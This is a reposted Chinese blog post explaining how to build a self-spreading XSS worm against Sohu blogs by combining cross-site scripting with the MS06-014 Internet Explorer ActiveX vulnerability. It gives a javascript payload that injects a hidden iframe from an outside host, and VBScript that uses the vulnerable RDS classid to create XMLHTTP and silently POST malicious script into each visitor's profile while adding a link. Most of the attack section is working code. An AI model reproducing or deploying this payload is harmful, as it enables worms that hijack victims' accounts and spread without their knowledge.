跨站结合MS06-014实现XSS worm

1.XSS代码长度限制,不能超过2000字符。
分析:写成JAVACRIPT后需转HTML编码十进制,一小段便超过2000字符了。

2.“域权限”限制。
分析:XSS worm的POST数据相关代码不能从站外调用,通俗点讲就是不能站外提交数据,包括调用外部JS用document.write方法,所以只能把POST数据的代码全部写到XSS里。


从正常的脚本代码上估计是没什么方法了,只有靠浏览器的漏洞,突破以上两点的思路:

1.直接用XSS代码写一个框架网页.

Quote:
javascript:for(i=0;i<document.images.length;i++){if(document.images.src.indexOf('j')==0)document.images.width=0};document.body.insertAdjacentHTML("afterBegin"," <iframe src=http://xxxxxx.com/ xss-worm.htm width=0 height=0></iframe")



2.利用MS06-014漏洞创建本地权限POST数据. xss-worm.htm 代码如下:

Quote:
<html>
<script language="VBScript">
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
x.Open "post"," http://blog.sohu.com/manage/profile.do",False
x.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
x.send " 恶意XSS数据"
x.Open "post"," http://blog.sohu.com//manage/link.do",False
x.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
x.send "m=add&title=Hacker%20s0n9&desc=XSS%20worm&link=http%3A//s0n9.blog.sohu.com"
</script>
</html>



分析:xss-worm.htm也就是框架网页,提交 恶意XSS数据到浏览者的资料里,至于 恶意XSS数据也就是第一步写框架网页修改个人资料所抓的包的内容,同时浏览者也会自动加一个友情连接。

总结:当浏览者进去XSS worm页面,就会自动修改自己的个人档案加入恶意XSS内容,同时其他浏览者也会传染,唯一的限制就是浏览器必须没有打MS06-014的补丁。

转载于:https://www.cnblogs.com/ljpbin/archive/2008/01/21/1047348.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值